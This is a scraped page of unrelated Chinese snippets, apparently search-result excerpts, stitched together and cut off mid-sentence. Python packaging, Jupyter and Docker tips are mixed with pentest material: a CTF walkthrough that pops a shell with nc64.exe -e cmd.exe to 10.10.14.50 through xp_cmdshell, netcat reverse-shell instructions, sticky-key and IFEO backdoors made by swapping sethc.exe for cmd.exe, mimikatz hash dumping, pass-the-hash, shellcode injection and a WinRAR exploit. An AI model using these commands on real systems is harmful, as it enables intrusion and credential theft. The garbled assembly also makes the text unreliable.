\nc64.exe -e cmd.exe 10.10.14.50 333” 目标主机xp_cmdshell运行这条命令即可将cmd弹到攻击机 此时进入桌面可以看到有一个文件,看样子是flag 看到flag...但是还不能提交flag,因为还有一个任务七,是跟提权相关的,毕竟这边弹过去的cmd也是当前用户的权限,相对来说比较低,那么现在进行提权操作 0x05....同样将winpeas用python临时起的http服务来让目标下载,注意,这时候就不用在用xp_cmdshell来执行了,直接用刚刚反弹过来的cmd去调powershell即可 注意,这里访问的文件是去分大小写的...通过管理员历史命令登录超级用户 根据任务7的提示是找到特定程序输入的内容的历史记录,由此找到powershell的consolehost_history.txt 查看这个txt看到管理员之前用net.exe...,看到有一个root.txt 试着打开一下 但是当我去打开root.txt的时候却提示我找不到文件。
你安装 Python,本质上就是在电脑上安装了一个文件夹,这个文件夹里面有一个 python.exe和各种子文件夹。...那么当我们在 CMD 里面直接输入 python xxx.py的时候,它用的是哪个 Python 呢?实际上这根本就不关 Python 的事情。这是系统的环境变量决定的。...当你 Python 运行的程序需要使用第三方库的时候,它就会到自己的 site-packages文件夹里面去寻找。...当你执行 scrapy命令的时候,CMD 会去环境变量里面对应的各个文件夹中寻找对应的 scrapy.exe文件,找到了就运行。...所以,可能会出现这样的情况,你在 Python 3.7.2环境里面安装了 Scrapy,但是在 CMD 里面运行却提示找不到 scrapy命令。
很容易理解这个使用方式,这里补充一点就是createprocess并不是cmd,不能用cmd里的命令方式来分割执行别的程序比如calc && notepad其中的notepad并没有正常运行。...那么当我们在某个程序里找到其传入createprocess函数时第二个变量可控,那么我们就可能可以执行命令。 1....完全可控就不多说了,这里我们简单谈一下参数可控的情况。一般来说参数可控,我们需要去查找对应程序的各种参数看看能不能达到包含外部执行的可能。...但比较有意思的是火狐好像不止开了一个进程: 在随后的进程里出现了一个把参数分割开的进程并运行。实际上我确实也在桌面上看到了两个火狐浏览器。 火狐这个行为给了我一个新的希望!...firefox.exe https://www.baidu.com\t-new-window\thttps://beef\t-headless 当我这样做的时候我发现存在一个问题,如果后台运行了一个headless
看pycharm的界面,就会觉得配合python会很好用 Jupyter Notebook 则是一个即时交互性的online IDE,支持含Python在内的40余种语言,还支持运行R语言和SQL等语言...一个特色是允许把代码写入独立的cell中,然后单独执行。这样做意味着用户可以在测试项目时单独测试特定代码块,无需从头开始执行代码。另一个优势还体现在比一般IDE平台更好的灵活性和交互性上。...若未能自动打开,可以复制这个网址,手动打开online Jupyter网页;也可以在cmd命令行中直接输入jupyter notebook,会输出该网址,并自动打开。...注意在使用Jupyter时,不要关闭Jupyter.exe命令行或者相应的cmd命令行,不然电脑认为是退出了这次登录,online网页就不工作了 Jupyter快捷键的使用,和其他内容详细介绍参见<安装和...,一定要选择你安装anaconda时的那个路径(一定要注意这点,这点我在错误集合-pycharm不能import tensorflow有论述),不然anaconda管理的各种包是不能使用的。
,先在本地主机运行 nc -l –vv -p 1234 开启1234 端口并监听等待远程主机连接;在远程主机上运行 nc -t -e cmd.exe 192.168.1.2 1234 将远程主机的 CMD...NC反弹CMDShell 在Web渗透中,有时候拿到了webshell,我们经常会执行很多命令进行提权等操作,但当我们要尝试很多命令的时候,使用webshell执行cmd往往没有本地执行方便,Web程序不稳定...【本地】netcat -l –vv -p 23 【Shell上】nc.exe -t -e cmd.exe X.X.X.X 23 其中X.X.X.X为本机公网IP,实际测试需确保外网能访问本机,必要时需端口映射等...【Shell上执行】nc.exe -t -e cmd.exe X.X.X.X 23 ? 【本地】成功得到CMDShell,即在本地可直接执行CMD ?...将shellcode注入到其他进程,还有另外一项优势:即使目标系统的安全防护工具能够监视可执行程序的完整性,只要它不检测内存,那么它就不能发现(插进程)后门程序的进程。
py2exe 介绍 py2exe是一个将python脚本转换成windows上的可独立执行的可执行程序(*.exe)的工具,这样,你就可以不用装python而在windows系统上运行这个可执行程序。...优点: 可以把python打包成exe 缺点: 打包好的 exe只能在相同的系统下运行,比如你在XP系统用py2exe打包好的exe只能在XP上运行,在win7上肯定有问题,而且也是存在在别的XP机子上也可能不能运行...前一个是多进程库,为了解决python用于数据密集型处理的情况;后一个用于异步IO处理的情况,基本原理就是在CPU时钟之间来回切换,简单的例子就是爬虫程序爬取网页的时候。...如果原.py程序使用图片添加的是绝对路径,在本地电脑上运行时可能不会发现错误。...但是我在打包中发现了一个文件,那就是在另一台电脑上无法运行…并且实际编译时需要近20分钟,编译的时候cpu持续100% 不过如果只是自己的电脑上运行的话,还是挺好使的 官方文档 注意nuitka对python
吐槽以下,这里的配置粘贴后,代码缩进只能用空格,而不能使用tab。...help,出现docker cli相关命令的用法: 使用Docker运行一个网站 从Docker Hub上,可以找到官方提供的一个网站镜像,名称为getting started。...不用管它,稍等一会儿它就会去线上,也就是我们之前设置的的腾讯云镜像拉取,就可以看到仓库pull的操作了。 接着在浏览器中输入localhost,即可访问网站。...在需要的位置,加gsudo.exe前缀。...我的做法是,复制一个cmd的配置,改成管理员。 这样我就可以根据自己的需要,切换到对应权限的终端了。 关闭nginx 用传统的方式,部署网站访问后,想要关掉怎么做呢?
utm_source=app 1.背景 如果你想用Python开发Windows程序,并让其开机启动等,就必须写成windows的服务程序Windows Service,用Python来做这个事情必须要借助第三方模块...win32serviceutil.ServiceFramework是封装得很好的Windows服务框架,本文通过继承它来实现。 通过SvcDoRun方法,实现服务启动,运行服务内的业务代码。...所以当我们放自己的代码在SvcDoRun函数中执行的时候,必须确保该函数不退出。...2).当停止服务的时候,系统会调用SvcDoStop函数,该函数通过设置标志位等方式让SvcDoRun函数退出,就是正常的停止服务。...(5) 原因:权限不够需要以管理员权限运行 解决方案:CDM管理员权限运行 具体方法: 第一步:先进到C:\Windows\SysWOW64\cmd.exe上右键,以管理员身份运行; 第二步:在此dos
---- 0x01 前言 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定...出于简化原因,IFEO使用忽略路径的方式来匹配它所要控制的程序文件名,所以程序无论放在哪个路径,只要名字没有变化,它就运行出问题。 下面呢,我们聊一聊如何打造不一样“映像劫持”后门。...事实上在该过程中,Windows还会在注册表的上述路径中查询所有的映像劫持子键,如果存在和该程序名称完全相同的子键,就查询对应子健中包含的”dubugger”键值名,并用其指定的程序路径来代替原始的程序...大家一定都知道映像劫持后门,在以下注册表中的sethc.exe项添加一个Debugger字符值(REG_SZ),并且赋值为cmd.exe的执行路径为C:\windows\system32\cmd.exe...使用Process Explorer进行检测进程的变化发现键入五下Shift执行时,先执行sethc.exe程序,当sethc.exe程序静默退出时,执行cmd.exe程序,运行效果如下: 0x05 来看一看它的原理
当然,随着SpringBoot单体发布模式的流行,现在用这种方式来获取数据库配置的古董公司,是越来越少了。 比如,我们可以在tomcat得server.xml里,配置一个叫做xjjdogDB的资源。...这个名字,它就能加载正确的配置。...程序启动起来,到底加载的什么东西,要看运行的环境配置的什么东西。 具体实现的话,不就是一个可以根据key获取value的HashMap嘛。...当它从本地加载相应类的时候,如果加载不到,它干了一件不该干但又不得不干的事情,那就是从网络上的代码里面构造相应的对象! 这下,在炫肌肉的同时,可完犊子了。...python -m http.server 8000 能够发起外网请求的服务器,将会乖乖的自动从我们指定的服务器上捞下非法的class文件进行加载。
众所周知,Python脚本不能在没有安装Python的机器上运行。 那我们如果写了一个数据分析/自动化办公的小脚本,想分享给同事小姐姐使用,可她电脑又没有装Python。...这个时候如果将脚本打包成exe文件,微信发送给她,即使她的电脑上没有安装Python解释器,这个exe程序也能在上面运行。岂不美哉? ?...(当然,想通过帮安装Python跟小姐姐建立感情的话,就当我没说) 安装Pyinstaller 首先我们要先安装Pyinstaller,直接在cmd使用pip命令 pip install pyinstaller...3、为了防止打包时候有些库没安装好,可以先在虚拟环境中执行一下Python脚本。运行无误的话再打包,比较保险。 ?...32位程序,但是如果不考虑32位系统的话无所谓,直接python64位版本直接打包就可以,只是只能在win64位系统上跑。
在命令提示下输入批处理文件的名称,或者双击该批处理文件,系统就会调用cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件或脚本,可以简化日常或重复性任务。...常用方法包括: 病毒融合Autoruns自启动机制 下图展示了Autoruns软件查看Windows操作系统的自启动选项,如果病毒本身能很好地结合这套机制,它可以做的事情非常多,并且具有很好的隐蔽性。...但它能让我们了解脚本病毒的某些功能,其原理是不断打开CMD程序,占用系统资源从而导致死机,并且每次开机都会自动启。 PS:这里强调一句,建议大家在虚拟机中运行该代码。...同时不能双击exp.py,需要Python来运行代码。 第四步,此时在当前文件夹生成了test.rar文件,将该压缩包发送给其他用户,如果目标电脑存在WinRAR漏洞,则会造成影响。...在Windows中只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的,最后那个是Win32子系统,ntsd本身需要它。
前言 Python 在 3.5 版本中引入了关于协程的语法糖 async 和 await, 在 python3.7 版本可以通过 asyncio.run() 运行一个协程。...所以建议大家学习协程的时候使用 python3.7+ 版本,本文示例代码在 python3.8 上运行的。 什么是协程?...大家都知道,洗衣机洗衣服是需要等待时间的,如果10个洗衣工,1人负责1台洗衣机,这样效率肯定会提高,但是不觉得浪费资源吗?明明1 个人能做的事,却要10个人来做。...协程很适合处理IO密集型程序的效率问题。协程的本质是个单线程,它不能同时将 单个CPU 的多个核用上,因此对于CPU密集型程序协程需要和多进程配合。...在早期面向进程设计的计算机结构中,进程是程序的基本执行实体; 在当代面向线程设计的计算机结构中,进程是线程的容器。 程序是指令、数据及其组织形式的描述,进程是程序的实体。
,坏处就是自己不能直接操作了: ?...在该所有者之前,直接编辑其权限都是灰色的,不能修改,有了所有权之后,便可以编辑其权限,这里需要给予自己权限,如下图: ?...之后在window下执行以下命令: cd c:\windows\system32 move sethc.exe sethc.exe.bak //备份sethc.exe copy cmd.exe sethc.exe...同时,当我们在权限维持时,如果留下了粘滞键后门,当用户修改密码后,我们在远程连接时可能会出现无法登录的情况,这时候上面这种后门进行权限维持就比较有用了: 第一种:创建cmd.exe粘滞键,之后在登录界面按下...替换为Utilman.exe(快捷键为: Win + U)或者osk.exe(屏幕上的键盘Win + U启动再选择) Narrator.exe (启动讲述人Win + U启动再选择) Magnify.exe
vue项目 npm run serve的时候,实际上就是执行了vue-cli-service serve 这条命令。...[image.png] 我:如果我们在 cmd 里运行的时候,windows 一般是调用了 vue-cli-service.cmd,这个文件,这是 windows 下的批处理脚本: @ECHO off...\@vue\cli-service\bin\vue-cli-service.js" %* 所以当我们运行vue-cli-service serve这条命令的时候,就相当于运行 node_modules/...然后这个脚本会使用 node 去运行vue-cli-service.js这个 js 文件 由于 node 中可以使用一系列系统相关的 api ,所以在这个 js 中可以做很多事情,例如读取并分析运行这条命令的目录下的文件...(电话挂断) tmd,c 总结 运行 npm run xxx的时候,npm 会先在当前目录的 node_modules/.bin 查找要执行的程序,如果找到则运行; 没有找到则从全局的 node_modules
如果对这块已经很熟悉的小伙伴,可以直接下滑到本文下半部分。 为什么要打包? 众所周知,Python脚本不能在没有安装Python的机器上运行。...这个时候如果将脚本打包成exe文件,微信发送给她,即使她的电脑上没有安装Python解释器,这个exe程序也能在上面运行。岂不美哉? ?...(当然,想通过帮安装Python跟小姐姐建立感情的话,就当我没说) 安装Pyinstaller 首先我们要先安装Pyinstaller,直接在cmd使用pip命令 pip install pyinstaller...3、为了防止打包时候有些库没安装好,可以先在虚拟环境中执行一下Python脚本。运行无误的话再打包,比较保险。 ?...32位程序,但是如果不考虑32位系统的话无所谓,直接python64位版本直接打包就可以,只是只能在win64位系统上跑。
1.什么是Windows BATCH BATCH也就是批处理文件,有时简称为BAT,是Windows平台上的一种可运行脚本,与*nix(Linux和Unix)上的Shell脚本和其它的脚本(Perl,Python...)等是一样的,实质上就是一个文本文件,可是用特定的软件去解释的时候,就变成了可运行脚本。...在Windows上,可运行脚本就是BATCH文件,也叫批处理文件,这是从DOS时代遗留下来的名字,意思就是把非常多命令放到一起来运行。...Windows的CMD没有*nix的Terminal那么强大,所以全然在其内做开发有点不切实际,尽管有非常多工具能够让CMD变得强大些,可是还是无法达到*nix那样的地步,由于它们从根本上就是走的不同的路线...怎样使用BAT BAT是一个可运行脚本,也就是说它跟一个*.exe可运行程序一样,仅仅要双击它就能够运行了。
注:但是在安装了KB2871997补丁或者系统版本大于windows server 2012时,系统的内存中就不再保存明文的密码,这样利用mimikatz就不能从内存中读出明文密码了。...0x03 读取域控中域成员Hash 3.1 域控本地读取 注:得在域控上以域管理员身份执行mimikatz 方法一:直接执行 #提升权限 privilege::debug 抓取密码 lsadump:...4.2 域环境 在域环境中,当我们获得了域内用户的NTLM哈希值,我们可以使用域内的一台主机用mimikatz对域控进行哈希传递攻击。执行完命令后,会弹出cmd窗口。...4.3 MSF进行哈希传递 有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口打开着。...详情请见:链接 6.2 隐藏功能 管理员常常会禁用一些重要程序的运行,比如cmd、regedit、taskmgr,此时不方便渗透的进一步进行,这里除了去改回原来的配置,还可以借助mimikatz的一些功能
要启动 Apache Web 服务器,请将要向受害者提供的文件放在/var/www/html中,然后运行命令: systemctl start apache2 现在您将有一个在端口 80 上运行的网络服务器...这可能很烦人,因为当服务器未在端口 80 上运行时,您始终必须将端口号添加到 URL 中。 我个人使用 Python HTTP 服务器的次数多于任何其他方法。.../upload.php 3.从攻击者的FTP服务器下载文件 3.1在攻击者机器上设置 FTP 服务器 在我们的攻击者机器上,我们可以使用许多不同的 FTP 程序来启动我们的服务器;然而,我们希望使用一些轻量级的东西...3.3从攻击者的FTP服务器下载文件:cmd.exe 当我们没有 GUI 访问权限时会发生什么?...对于此示例,在攻击者计算机上的端口 443 上启动 netcat 侦听器,然后在受害者上执行以下命令: \\172.16.1.30\hax\nc.exe 172.16.1.30 443 -e cmd.exe
大家好,今天给大家推荐一个可视化神器,它就是Auto-py-to-exe,它是一个用于将Python程序打包成可执行文件的图形化工具。...安装Auto-py-to-exe 首先我们要确保我们的Python环境要大于或等于2.7然后在cmd里面输入:pip install auto-py-to-exe 输入完成之后,pip就会安装auto-py-to-exe...安装完成之后,我们就可以在cmd输入:auto-py-to-exe,来启动auto-py-to-exe程序了。 出现上述图片,auto-py-to-exe就安装成功了。...Auto-py-to-exe部分选项介绍 在使用Auto-py-to-exe打包python程序的时候,有许多配置选项需要我们去指定,能正确知道这些选项的作用是十分重要的。...的python程序打包 (4) Icon:用于指定打包程序的图标 Auto-py-to-exe实战 本节主要以一个计算器程序来介绍如何使用Auto-py-to-exe来打包程序。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
